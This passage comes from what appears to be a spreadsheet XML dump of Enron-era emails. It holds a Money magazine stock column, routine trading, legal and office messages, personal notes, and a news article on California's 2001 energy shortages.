Gamble for $4.95 billion. That sale will reduce the percentage of_x000D_
Bristol-Myers' business that comes from consumer products. Even more_x000D_
important, when the deal closes, Bristol-Myers will have $6 billion in cash_x000D_
-- four times its total debt outstanding. That cash hoard can be used to_x000D_
make acquisitions. Pharmaceutical giants are like movie studios -- they're_x000D_
basically immense distribution systems looking for product. All_x000D_
Bristol-Myers has to do is revamp its product pipeline with the acquisition_x000D_
of boutique drug companies or biotech firms, and the stock will suddenly_x000D_
look a whole lot flashier._x000D_
_x000D_
Since it won't be hard for Bristol-Myers to complete its transformation_x000D_
into a drug powerhouse, without even hurting its balance sheet, you'd think_x000D_
that investors would be giving the stock more of a premium. At $56.25,_x000D_
Bristol-Myers trades at 24 times this year's estimated earnings. That's_x000D_
certainly a fair valuation for a stock with a 12 percent core growth rate_x000D_
and a 2 percent dividend yield. But if you look not at what Bristol-Myers_x000D_
has been, but what it so easily could become, you'd think a substantially_x000D_
higher P/E should be in order._x000D_
_x000D_
###_x000D_
_x000D_
Post your comments on Michael's column at:_x000D_
http://www.money.com/depts/investing/sivy/index.html_x000D_
_x000D_
To subscribe or unsubscribe to Sivy on Stocks, go to:_x000D_
http://www.money.com/email/_x000D_
_x000D_
-----------------------------------------------------------_x000D_
CONTACT THE BIGGEST COMPANIES IN THE WORLD!_x000D_
Over 5,000 contact names in the OFFICIAL FORTUNE Databases._x000D_
DOWNLOAD THEM NOW!_x000D_
http://www.fortune.com/sitelets/datastore/index.html?mn01_x000D_
-----------------------------------------------------------_x000D_
_x000D_
* * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * *_x000D_
_x000D_
Special Internet Offer!!!_x000D_
_x000D_
Sign up for a RISK-FREE issue of MONEY MAGAZINE at_x000D_
http://www.money.com/subscribe2_x000D_
_x000D_
Or if you prefer call our toll-free number 1-800-544-4594_x000D_
_x000D_
* * *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Wed, 18 Jul 2001 10:41:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'julie.green@enron.com'})</t>
  </si>
  <si>
    <t>LME Fine background</t>
  </si>
  <si>
    <t xml:space="preserve">Steve,_x000D_
_x000D_
Please see attached a background note and update relating to the LME fine _x000D_
issued to Enron Metals.  Please let me know if you have any questions, or _x000D_
would like any further information on this._x000D_
_x000D_
Regards_x000D_
_x000D_
_x000D_
Julie Green_x000D_
</t>
  </si>
  <si>
    <t>BPA(T) FOR SUNDAY</t>
  </si>
  <si>
    <t>ENRON SOLD APC  20 MW LL ON SUNDAY ONLY.  BPA(T) MONTHLY FIRM O#311916.  THE _x000D_
(T) HAS BEEN CALLED INTO BPA. (SEE PATH BELOW)_x000D_
_x000D_
_x000D_
BURBANK@TULOOKA-BURBAK(T) TUL/SYLMAR/NOB-APC-EPMI-BPA(T) NOB/BE _x000D_
O#311916-APC-SNPD-BPA(T) BE/EWEB-EWEB@SYS_x000D_
_x000D_
THANKS_x000D_
MIKE PURCELL</t>
  </si>
  <si>
    <t>Mon, 24 Jul 2000 03:02:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Accounts</t>
  </si>
  <si>
    <t>Jay,_x000D_
_x000D_
I looked over the info you forwarded but have decided to just buy two mutual _x000D_
funds.  Unless you have a better suggestion, buy APGCX and MCGTX.  And I _x000D_
really mean it when I say if you have a better suggestion let me know.  It _x000D_
looks like the transfers worked properly.  But are the automatic purchases of _x000D_
mutual funds in place?  I don't see the activity on the web page.  Lastly, _x000D_
and I think this is just administrative stuff, Kristi's Roth IRA does not _x000D_
show up on the web or on the statements we receive in the mail.  Thanks._x000D_
_x000D_
DG</t>
  </si>
  <si>
    <t>Tue, 17 Jul 2001 06:16:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>To All:_x000D_
_x000D_
Please read the attached SAVE THE DATE invitation to our SVMG/City of_x000D_
Cupertino Energy Efficiency Conference in partnership with NRDC._x000D_
_x000D_
California has succeeded well in avoiding blackouts with unprecedented_x000D_
energy efficiency and conservation.  But it is still too early to pop the_x000D_
champagne corks.  It is imperative that we lock in our efficiency gains to_x000D_
be effective stewards of our resources and minimize high energy costs well_x000D_
into the future.  Let us help you do that!_x000D_
_x000D_
I hope that you can attend._x000D_
_x000D_
Best,_x000D_
_x000D_
Carl_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
 - Save the Date Aug. 24 Energy Conference.doc</t>
  </si>
  <si>
    <t>Thu, 25 Oct 2001 04:22:59 -0700 (PDT)</t>
  </si>
  <si>
    <t>Dinner</t>
  </si>
  <si>
    <t>Had a good time with your pops last night. I told him no one was better than you. Thanks for the email.  _x000D_
_x000D_
H_x000D_
Heather Kroll</t>
  </si>
  <si>
    <t>Wed, 21 Nov 2001 08:16:53 -0800 (PST)</t>
  </si>
  <si>
    <t>Mon, 2 Aug 1999 04:03:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Atlantic Packaging</t>
  </si>
  <si>
    <t xml:space="preserve">I think this is the best way to look at these. Deal ticket is below. Call _x000D_
when you can._x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Wed, 21 Nov 2001 12:36:12 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'c..willard@enron.com'})</t>
  </si>
  <si>
    <t>FW: Yoga</t>
  </si>
  <si>
    <t>Hello Mr. Derrick:_x000D_
_x000D_
It was a pleasure talking to you yesterday about our yoga classes, it was very interesting hearing your opinion about the Power Yoga!_x000D_
_x000D_
I also mentioned to you that I am running a marathon in Hawaii on December 9.  I am running on behalf of Sarah, a cute 10 year old girl that has arthritis since she was 18 months old and she hasn't been able to be a normal kid.  If you don't mind I would like to ask you if you will be so kind to sponsor me with a small donation to this worthy organization.  I actually, committed to collect $3,800 for them to be able to run de marathon and I was doing so great that I almost had it made, but today when we received the email about no more matching donations put me a little bit behind. _x000D_
_x000D_
Please let me know and I could send Joey to pick up the donation.  If not, please don't feel bad, I understand we are going through very hard times lately._x000D_
_x000D_
Thank you so much, Mr. Derrick and I will be seeing you at the yoga class if you can make it on Saturday._x000D_
_x000D_
Candy  :  )_x000D_
1400 Smith, Ste. 4855_x000D_
EB-4855_x000D_
713-345-4455</t>
  </si>
  <si>
    <t>Tue, 27 Nov 2001 08:16:54 -0800 (PST)</t>
  </si>
  <si>
    <t>RE: PEP SYSTEM Reviewers?</t>
  </si>
  <si>
    <t>no_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Geaccone, Tracy  _x000D_
Sent:	Tuesday, November 27, 2001 9:23 AM_x000D_
To:	Hayslett, Rod_x000D_
Subject:	RE: PEP SYSTEM Reviewers?_x000D_
_x000D_
Any special requirements i.e. # of reviewers, peers, etc.?_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Hayslett, Rod  _x000D_
Sent:	Tuesday, November 27, 2001 8:18 AM_x000D_
To:	Campos, Kathy; Centilli, James; Daily, Pamela; Geaccone, Tracy; Gilbert, Steve; Ratner, Michael; Rosenberg, David E._x000D_
Subject:	PEP SYSTEM Reviewers?_x000D_
_x000D_
_x000D_
_x000D_
Rod Hayslett_x000D_
EB4054_x000D_
713-853-6178</t>
  </si>
  <si>
    <t>Thu, 30 Nov 2000 08:58:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'stephanie.taylor@enron.com'})</t>
  </si>
  <si>
    <t>Re: Subscripton Renewal</t>
  </si>
  <si>
    <t xml:space="preserve">Yes, renew my subscription._x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
	Stephanie E Taylor_x000D_
	11/29/2000 01:19 PM_x000D_
		_x000D_
		 To: Mark E Haedicke/HOU/ECT@ECT_x000D_
		 cc: _x000D_
		 Subject: Subscripton Renewal_x000D_
_x000D_
_x000D_
Dear Mark,_x000D_
_x000D_
This is to inform you that your subscription to Risk is up for renewal.  The _x000D_
regular subscription cost through December, 2001, is $599.00.  The cost after _x000D_
the corporate discount is $509.15._x000D_
_x000D_
Please let me know if you would like to renew this publication.  We will be _x000D_
happy to take care of this for you.  If you have any questions, please do not _x000D_
hesitate to call me._x000D_
_x000D_
Sincerely,_x000D_
Stephanie E. Taylor  _x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Wed, 25 Oct 2000 09:03:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>New PX Nodes and Sockets</t>
  </si>
  <si>
    <t>We have a new version of the PX trade app installed to accomodate the new SC _x000D_
Trading capability.      Make sure that you input the new nodes and sockets _x000D_
as reflected in the new login info sheet by the machine._x000D_
_x000D_
Thanks,_x000D_
_x000D_
JMF</t>
  </si>
  <si>
    <t>Mon, 30 Oct 2000 00:06:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'pipip@andrews-kurth.com'})</t>
  </si>
  <si>
    <t>Re: ABB facility agrement</t>
  </si>
  <si>
    <t xml:space="preserve">Hi Paul,_x000D_
_x000D_
I would like to  change my previous response to this email.  I would like to _x000D_
get a cleaned up version of the GE contract (without WestLB references) so _x000D_
that I can make a wider internal distribution without having to explain the _x000D_
references to WestLB._x000D_
_x000D_
The intial read from GE was positive, but the devil is in the details, of _x000D_
course._x000D_
_x000D_
Kay_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
"PAUL PIPITONE" &lt;PIPIP@andrews-kurth.com&gt; on 10/24/2000 06:04:20 PM_x000D_
To: &lt;Kay.Mann@enron.com&gt;_x000D_
cc:  _x000D_
_x000D_
Subject: Re: ABB facility agrement_x000D_
_x000D_
Kay:  references to WestLB are in only a few places in the GE Contract; _x000D_
namely, the recitals and sections 3.8(c)(2), 5.1, 6.1, 7.2.4, 30.7 and _x000D_
30.12.  The references in the recitals, 3.8(c),7.2.4, 30.7 and 30.12 can be _x000D_
handled fairly easily.  The references in 5.1 and 6.1 deal with pricing _x000D_
matters and will require a little work once the pricing mechanism is worked _x000D_
out with GE.  My suggestion would be to not revise the document at this time _x000D_
and make these changes at the same time we make any other changes arising _x000D_
from the discussions with GE.  PLease let me know what you think.  Regards, _x000D_
Paul_x000D_
_x000D_
&gt;&gt;&gt; &lt;Kay.Mann@enron.com&gt; 10/24/00 12:37PM &gt;&gt;&gt;_x000D_
_x000D_
Thanks.  This is a  very drastic situation, so the draft will be_x000D_
appreciated._x000D_
_x000D_
As I recall you were going to turn another draft of the GE facility_x000D_
agreement, deleting the WestLB references.  When will this be forthcoming?_x000D_
_x000D_
Thanks,_x000D_
_x000D_
Kay_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
"PAUL PIPITONE" &lt;PIPIP@andrews-kurth.com&gt; on 10/24/2000 08:35:34 AM_x000D_
_x000D_
To:   &lt;Kay.Mann@enron.com&gt;_x000D_
cc:_x000D_
_x000D_
Subject:  Re: ABB facility agrement_x000D_
_x000D_
Peter Thompson is working on it.  We should have a draft Wednesday._x000D_
Regards, Paul_x000D_
_x000D_
&gt;&gt;&gt; &lt;Kay.Mann@enron.com&gt; 10/23/00 05:38PM &gt;&gt;&gt;_x000D_
Paul,_x000D_
_x000D_
When can we expect a draft of the ABB facility agreement? It is getting_x000D_
urgent._x000D_
_x000D_
Thanks,_x000D_
_x000D_
Kay_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Tue, 25 Sep 2001 13:42:17 -0700 (PDT)</t>
  </si>
  <si>
    <t>PIRA's Monthly Gas Forecasts 09/25/01</t>
  </si>
  <si>
    <t xml:space="preserve">Attached is PIRA's latest "Monthly Gas Forecast."_x000D_
_x000D_
If you have any questions regarding the report's content, please_x000D_
contact: Greg Shuttlesworth (email: greg@pira.com), Tom Howard (email:_x000D_
tazh@pira.com), Richard Redash (email: Rich@pira.com), Nobu Tarui_x000D_
(email: nobuo@pira.com) or Jane Hsu (email: jane@pira.com), at (212)_x000D_
686-6808._x000D_
_x000D_
Contact Client Services regarding PIRA report distribution and address_x000D_
changes at (212) 686-6808, email: support@pira.com._x000D_
_x000D_
NOTE: Circulation of the "Monthly Gas Forecast" outside a Client's_x000D_
licensed distribution area is strictly prohibited. Clients that are_x000D_
unsure of their licensed distribution or require an extension of their_x000D_
current license should contact their PIRA sales representative, or email_x000D_
to sales@pira.com._x000D_
_x000D_
PIRA Energy Group_x000D_
_x000D_
_x000D_
 - gassep01.pdf </t>
  </si>
  <si>
    <t>Fri, 24 Mar 2000 02:31:00 -0800 (PST)</t>
  </si>
  <si>
    <t>CES Daily March Requirements for 3/24 and after</t>
  </si>
  <si>
    <t>Please see attached.  We'll be calling in a few minutes to notify of daily_x000D_
swings and to negotiate prices._x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Doug Kinney_x000D_
Ph:  703-561-6339_x000D_
Fax:  703-561-7317_x000D_
_x000D_
 - 03-24-00 CES Daily VolsAM.xls</t>
  </si>
  <si>
    <t>Fri, 20 Jul 2001 08:36:57 -0700 (PDT)</t>
  </si>
  <si>
    <t>RE: ENA-ECC Force Majeure</t>
  </si>
  <si>
    <t>No.  If they declare FM against us, the operative wording in the agreement =_x000D_
is "to the extent that they are affected by such event".  In other words, t=_x000D_
hey can only cut a deal to the extent the force majeure prevents them from =_x000D_
performing._x000D_
_x000D_
 -----Original Message-----_x000D_
From: =09Mckay, Jonathan =20_x000D_
Sent:=09Friday, July 20, 2001 9:29 AM_x000D_
To:=09Johnston, Greg_x000D_
Subject:=09RE: ENA-ECC Force Majeure_x000D_
_x000D_
Greg,_x000D_
_x000D_
Do they have any right to cut a deal by more than the amount that the pipel=_x000D_
ine declared as its force majure volume?_x000D_
_x000D_
Jon McKay_x000D_
Unemployed_x000D_
phone: 403-974-6733_x000D_
jonathan.mckay@enron.com_x000D_
_x000D_
 -----Original Message-----_x000D_
From: =09Johnston, Greg =20_x000D_
Sent:=09Friday, July 20, 2001 8:11 AM_x000D_
To:=09Heal, Kevin_x000D_
Cc:=09Mckay, Jonathan_x000D_
Subject:=09ENA-ECC Force Majeure_x000D_
_x000D_
Kevin, further to your voice-mail, as indicated to you yesterday, our physi=_x000D_
cal gas master agreement with ENA is in their form of Enfolio master agreem=_x000D_
ent and not our form of master.  What that means is that, although the mech=_x000D_
anics of declaring force majeure, etc. are the same, the definition of forc=_x000D_
e majeure under our Enfolio master with ENA is not restricted to delivery p=_x000D_
oint force majeure as it is in ECC's standard form, but is rather a broader=_x000D_
 based force majeure.  However, it must be kept in mind that, depending on =_x000D_
the transaction, the definition of "force majeure" may be amended in the te=_x000D_
rms of the particular confirmation letter.  The application section (which =_x000D_
is basically the same as in our form) is as follows:_x000D_
_x000D_
This Article 5 is the sole and exclusive excuse of performance permitted un=_x000D_
der this Agreement, and all other excuses at law or in equity are waived to=_x000D_
 the extent permitted by law.  Except with regard to payment obligations, i=_x000D_
n the event either Party is rendered unable, wholly or in part, by Force Ma=_x000D_
jeure to carry out its obligations hereunder, it is agreed that upon such P=_x000D_
arty's giving notice and full particulars of such Force Majeure to the othe=_x000D_
r Party as soon as reasonably possible (such notice to be confirmed in writ=_x000D_
ing), the obligations of the Party giving such notice, to the extent that t=_x000D_
hey are affected by such event, shall be suspended from the inception and d=_x000D_
uring the continuance of the Force Majeure for a period of up to 60 Days in=_x000D_
 the aggregate during any 12 Month period, but for no longer period.  The P=_x000D_
arty receiving notice of Force Majeure may immediately take such action as =_x000D_
it deems necessary at its expense for the entire 60 Day period or any part =_x000D_
thereof.  The Parties expressly agree that upon the expiration of the 60 Da=_x000D_
y period Force Majeure shall no longer apply to the obligations hereunder a=_x000D_
nd both Buyer and Seller shall be obligated to perform..._x000D_
_x000D_
I will send a copy of the agreement over to you which also contains the def=_x000D_
inition of Force Majeure, but again it must be remembered that such definit=_x000D_
ion may be amended in the particular confirm._x000D_
_x000D_
Greg Johnston_x000D_
Senior Counsel_x000D_
Enron Canada Corp._x000D_
phone: 403-974-6745_x000D_
greg.johnston@enron.com</t>
  </si>
  <si>
    <t>Tue, 11 Sep 2001 04:25:56 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'charles.ward@enron.com'})</t>
  </si>
  <si>
    <t>Re: Outstanding!</t>
  </si>
  <si>
    <t>0 to 5 percent.  It would be similar to having the BOD of Enron turning down a project with frevert, kitchen and duran support with a signed dash.  Unless the BOD is planning on a new CEO, this is unlikely to happen._x000D_
_x000D_
As a further indication of their confidence, the deal team is spending 3 days in Vail this week, with family, to reccuperate (sp?). _x000D_
--------------------------_x000D_
Sent from my BlackBerry Wireless Handheld (www.BlackBerry.net)</t>
  </si>
  <si>
    <t>Wed, 15 Nov 2000 02:55:00 -0800 (PST)</t>
  </si>
  <si>
    <t>EOL Deal Summary - 11/14</t>
  </si>
  <si>
    <t xml:space="preserve">I'm sorry for the delay on this, Tim. I've been in contact with Will Smith in _x000D_
Houston since yesterday to try to fix the problem of PX, Imbalance, and Tie _x000D_
Point deals uploading as Enron Online deals. Here are the correct statistics._x000D_
</t>
  </si>
  <si>
    <t>Wed, 22 Nov 2000 09:58:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'douglass@arterhadden.com'})</t>
  </si>
  <si>
    <t>frozenset({'susan.j.mara@enron.com'})</t>
  </si>
  <si>
    <t>Re: WPTF FERC Filing</t>
  </si>
  <si>
    <t>Nope, Ned is history......now if we can only make?our  own?regulatory _x000D_
Luddites history, as well!_x000D_
?_x000D_
Thanks for the kind words, Sue.? Happy Thanksgiving to you and your  family._x000D_
?_x000D_
Dan_x000D_
_x000D_
&gt;&gt;&gt; &lt;Susan.J.Mara@enron.com&gt; 11/22/00 01:44PM  &gt;&gt;&gt;_x000D_
_x000D_
I just want to thank Dan, Bob, Phil and everyone who  contributed to WPTF's_x000D_
comments.? I think they are KICK BUTT!! My  favorite -- regulatory Luddites!_x000D_
Het, Dan, did you make up Ned Ludd??  That just seemed too good to be true.</t>
  </si>
  <si>
    <t>Thu, 6 Jan 2000 14:07:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'rick.cates@enron.com'})</t>
  </si>
  <si>
    <t>frozenset({'michel.nelson@enron.com', 'rick.craig@enron.com'})</t>
  </si>
  <si>
    <t>Tech Services 2000 Objectives</t>
  </si>
  <si>
    <t xml:space="preserve">After a great deal of input from a large group of people what I hope is the _x000D_
almost final draft of the 2000 Tech Services is attached below._x000D_
Please take a look at them._x000D_
I will be at the Operations Directors Meeting next week to go over them._x000D_
For the Tech Service Teams you may find some of these which are appropriate _x000D_
to use in your Teams and Individual objectives._x000D_
If you have any questions please let me know._x000D_
Thanks_x000D_
Rick Cates                                                         _x000D_
                                                           _x000D_
</t>
  </si>
  <si>
    <t>Wed, 11 Apr 2001 11:12:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Space Planning - Product Control Group</t>
  </si>
  <si>
    <t xml:space="preserve">This is the note that I mentioned that I sent to Philippe today about space _x000D_
in the new building.  You can take up the cause with Philippe when he _x000D_
returns.  I am meeting with Tammy Shepperd at 1:30 tomorrow on some space _x000D_
planning details.  I will tell her that Sheri's group should be located with _x000D_
yours, and by that time I should be able to tell her that Sheri's group will _x000D_
be reporting to you.  _x000D_
_x000D_
I will call you tomorrow after I talk with Sheri - should be by 11:00 am.  _x000D_
--Sally _x000D_
_x000D_
_x000D_
---------------------- Forwarded by Sally Beck/HOU/ECT on 04/11/2001 06:08 PM _x000D_
---------------------------_x000D_
   _x000D_
	Enron North America Corp._x000D_
	_x000D_
	From:  Sally Beck                           04/11/2001 10:00 AM_x000D_
	_x000D_
_x000D_
To: Philippe A Bibi/HOU/ECT_x000D_
cc: Sheri Thomas/HOU/ECT@ECT _x000D_
Subject: Space Planning - Product Control Group_x000D_
_x000D_
According to Tammy Shepperd who is very involved in space allocation for the _x000D_
new building, a location for Sheri Thomas' Product Control Group remains up _x000D_
in the air.  Sheri, Andy Zipper, John Cummings, and Surresh have met to _x000D_
discuss space, and all agree that Sheri's group needs to be located with _x000D_
their groups.  My understanding is that you have designated a certain number _x000D_
of spaces for ENW on the trading floors, but that Sheri's group is not _x000D_
included in that count.  Can we get together when you return to the office _x000D_
next week and discuss floor space?  Thanks.  --Sally _x000D_
</t>
  </si>
  <si>
    <t>Mon, 21 Aug 2000 08:30:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Huish</t>
  </si>
  <si>
    <t xml:space="preserve">Dan,_x000D_
_x000D_
Please see attached Credit Worksheet for Huish.  As discussed this Agreement _x000D_
must be signed in conjunction with Mike Morris's proposed transaction._x000D_
_x000D_
Thank you,_x000D_
_x000D_
Russell_x000D_
</t>
  </si>
  <si>
    <t>Mon, 22 Oct 2001 11:42:25 -0700 (PDT)</t>
  </si>
  <si>
    <t>fyi_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Zufferli, John  _x000D_
Sent:	Monday, October 22, 2001 1:41 PM_x000D_
To:	Shankman, Jeffrey A._x000D_
Subject:	RE: _x000D_
_x000D_
I never wrote nor implied that I was intending to hedge currency exposure with a third party.  I implied that I will hedge with you guys when and where I deem appropriate in the term structure._x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Shankman, Jeffrey A.  _x000D_
Sent:	Monday, October 22, 2001 12:31 PM_x000D_
To:	Zufferli, John_x000D_
Subject:	_x000D_
_x000D_
John, _x000D_
_x000D_
I don't have all the facts around this transaction, but I don't think you are authorized to hedge currency exposure with outside counterparties as you've outlined in your email to Hickerson, etc.  I'd appreciate some information._x000D_
_x000D_
Jeff</t>
  </si>
  <si>
    <t>Wed, 21 Mar 2001 00:53:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'erica.braden@enron.com'})</t>
  </si>
  <si>
    <t>frozenset({'kaye.ellis@enron.com', 'sara.shackleton@enron.com'})</t>
  </si>
  <si>
    <t>Information regarding Samantha Boyd</t>
  </si>
  <si>
    <t>Good Morning Sara and Kaye,_x000D_
_x000D_
The following information is what we received from Samantha's family/pastor _x000D_
last night._x000D_
_x000D_
There will not be a wake for Taylor, however, there will be a viewing _x000D_
tomorrow, Thursday, March 22, 2001 at 10:00 a.m. and funeral services will be _x000D_
held at 11:00 a.m. at Greater Pure Light, MBC.  Directions (from downtown) _x000D_
are as follows:_x000D_
_x000D_
Take 59N to Laura Koppe.  Take the Laura Koppe exit and make a right on Laura _x000D_
Koppe.  Take Laura Koppe to Homestead.  Make a left on Homestead and a quick _x000D_
right on Kelburn.  The address is 8802 Kelburn._x000D_
_x000D_
Samantha's Pastor (Pastor Broussard) informed us last night that due to the _x000D_
fact that the adoption had not been finalized, Taylor was not covered by any _x000D_
form of insurance.      _x000D_
_x000D_
FYI:  Just in case you don't know, Samantha's husbands's name is Twalure Boyd._x000D_
_x000D_
Erica S. Braden_x000D_
Sr. Administrative Assistant_x000D_
Enron Broadband Services - Legal_x000D_
(713) 853-6666_x000D_
erica_braden@enron.net</t>
  </si>
  <si>
    <t>Mon, 20 Sep 1999 09:23:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Missing GTC's</t>
  </si>
  <si>
    <t>Mark,_x000D_
_x000D_
I notice that we have GTC's for EGLI Liquids(without collateral) and ELFI _x000D_
Crude-Products-Petchems (without collateral), but we do not have GTC's for _x000D_
EGLI Liquids (with collateral) or ELFI Crude-Products-Petchems (with _x000D_
collateral).   Is this correct? _x000D_
_x000D_
Please let me know your thoughts._x000D_
_x000D_
Thanks!_x000D_
_x000D_
Frank_x000D_
x37235</t>
  </si>
  <si>
    <t>Sun, 19 Mar 2000 23:27:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Penn Fuel CGAS capacity</t>
  </si>
  <si>
    <t xml:space="preserve">I just  changed the demand charge on the Penn Fuel capacity from 6.53 to _x000D_
6.423 (deal 205687).  I changed the price on the Penn Fuel released demand _x000D_
from 6.449 to 6.423 (deal 205672).  We were billed 6.423 in January.  That's _x000D_
an odd rate when everthing else was 6.50. </t>
  </si>
  <si>
    <t>Wed, 6 Dec 2000 02:35:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'kam.keiser@enron.com', 'david.baumbach@enron.com', 'errol.mclaughlin@enron.com', 'william.kelly@enron.com'})</t>
  </si>
  <si>
    <t>Re: Class</t>
  </si>
  <si>
    <t xml:space="preserve">I vote for next week.  And since I didn't get involved in the prior _x000D_
discussion, I think a class on craps is in order._x000D_
_x000D_
DG_x000D_
_x000D_
_x000D_
   _x000D_
	_x000D_
	_x000D_
	From:  William Kelly                           12/06/2000 09:58 AM_x000D_
	_x000D_
_x000D_
To: Jeffrey C Gossett/HOU/ECT@ECT, Errol McLaughlin/Corp/Enron@ENRON, David _x000D_
Baumbach/HOU/ECT@ECT, Darron C Giron/HOU/ECT@ECT, Kam Keiser/HOU/ECT@ECT_x000D_
cc:  _x000D_
Subject: Class_x000D_
_x000D_
I have not had an opportunity to set anything up for this week, yet.  We can _x000D_
shoot for Thursday or Friday or we can push back to next week.  Also, let me _x000D_
know what topic you think should be next.  Darron and I are up...._x000D_
_x000D_
WK_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Thu, 1 Mar 2001 01:17:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'marty.sunde@enron.com', 'kevin.hughes@enron.com', 'steve.walton@enron.com', 'robert.neustaedter@enron.com', 'tony.spruiell@enron.com', 'kathryn.corbally@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james.lewis@enron.com', 'james.wright@enron.com', 'greg.wolfe@enron.com', 'tamara.johnson@enron.com', 'robert.williams@enron.com', 'jeff.messina@enron.com', 'sandra.mccubbin@enron.com', 'eric.melvin@enron.com', 'neil.hong@enron.com', 'jennifer.rudolph@enron.com', 'dorothy.youngblood@enron.com', 'triley@enron.com', 'harold.buchanan@enron.com', 'wgang@enron.com', 'linda.robertson@enron.com', 'karen.denne@enron.com', 'william.bradford@enron.com', 'jklauber@llgm.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douglas.condon@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 xml:space="preserve">			The word is gettng out.  SOme good Ackerman quotes. _x000D_
			_x000D_
_x000D_
			_x000D_
			_x000D_
			_x000D_
			_x000D_
			Energy Experts Belie Davis' Rosy Prediction_x000D_
Summer expected to be crunch time_x000D_
_x000D_
Greg Lucas, Sacramento Bureau Chief _x000D_
			?_x000D_
			Wednesday,?February 28, 2001 _x000D_
			_x000D_
			_x000D_
			_x000D_
			_x000D_
			_x000D_
			_x000D_
_x000D_
			_x000D_
			Sacramento -- Gov. Gray Davis' optimistic assessment that California may be _x000D_
on the "back side" of its energy crisis flies in the face of what many energy _x000D_
companies and other experts predict. _x000D_
			California's real test will come this summer when electricity usage sharply _x000D_
increases, and unless everything breaks the way Davis hopes, predictions are _x000D_
that large chunks of the state will be in the dark. _x000D_
			"We're not on the back side of this crisis. This problem is far, far bigger _x000D_
than the governor is suggesting," said Gary Ackerman, executive director for _x000D_
the Western Power Trading Forum in Menlo Park. _x000D_
			"To characterize the problem that way shows a recklessness that feeds on the _x000D_
popular notion we don't have an energy crisis. We do. We have a very serious _x000D_
one that's going to hit us as temperatures and loads go up," Ackerman said. _x000D_
			The Democratic governor's comments were made Monday in Washington, D.C., _x000D_
during an East Coast visit aimed at getting Washington and Wall Street _x000D_
support for his energy plan. _x000D_
			He admitted more hard work is needed, but said the state is on the "back side _x000D_
of the crisis" because lawmakers have passed bills needed to help lower _x000D_
electricity prices. _x000D_
			"Does that mean we're home free?" Davis asked yesterday. "No." _x000D_
			But he again repeated that the state is on the back side of the crisis. _x000D_
			That is contrary to predictions by the Independent System Operator, which _x000D_
oversees the state's power market. _x000D_
			On any given day in June, the ISO estimates, the state will fall 6,815 _x000D_
megawatts short of demand. That would put nearly 7 million homes in the dark, _x000D_
if it happens. _x000D_
			In July, the expected shortage is 4,685 megawatts. In August, it's 5,297 _x000D_
megawatts. That's if California has a normal summer. If it's hotter than _x000D_
normal, the shortage grows. _x000D_
			The ISO's estimates tend to be conservative and do not include Davis' _x000D_
conservation goal. _x000D_
			But even if a 10 percent reduction were achieved in June that would save _x000D_
roughly 5,000 megawatts, the state would still be short 1,800 megawatts. _x000D_
			And there are other variables. _x000D_
			Depending on the snowpack and reservoir levels, hydroelectric plants may not _x000D_
be able to run at full bore, which would also worsen the situation. _x000D_
			"That is something the governor cannot spin his way out of," said Sen. Tom _x000D_
McClintock, R-Northridge. _x000D_
			Davis said a combination of new power plants and energy conservation will _x000D_
help the state get through this summer. _x000D_
			The clock is running. The ISO predicts shortages of 3,030 megawatts in May - _x000D_
- just two months away. _x000D_
			"The real electricity crisis is going to be this summer, and I don't think _x000D_
we've made enough progress there," said Severin Borenstein, director of the _x000D_
University of California Energy Institute. _x000D_
			California won't be able to build its way out of the energy crisis by quickly _x000D_
approving and building new power plants, Borenstein said. _x000D_
			The ISO's demand estimates already factor in the new power plants set to come _x000D_
online this summer. _x000D_
			"Unless we have a very mild summer and have lots of rainfall between then and _x000D_
now," Borenstein said, "we are going to face some serious shortages." _x000D_
			Like Davis, Borenstein says California needs to do more to conserve energy. _x000D_
Unlike Davis, he favors raising prices on big power consumers to give them an _x000D_
incentive to cut back. _x000D_
			But the Democratic governor may be sending Californians a mixed message. _x000D_
			By telling them the worst is over, he could undercut his plan by making _x000D_
people believe more conservation is unnecessary. _x000D_
			Excluding what lies ahead, there are also plenty of energy issues left _x000D_
unresolved right now. _x000D_
			Although Davis has reached a tentative deal with Southern California Edison _x000D_
on purchasing its share of the state's transmission system for $2.7 billion _x000D_
-- no such deal exists with either Pacific Gas &amp; Electric or San Diego Gas &amp; _x000D_
Electric. _x000D_
			Some alternative energy producers, like co-generation plants, are shutting _x000D_
down because the cash-poor utilities haven't paid them for several months. No _x000D_
cash means no fuel to run the turbines that make the juice. _x000D_
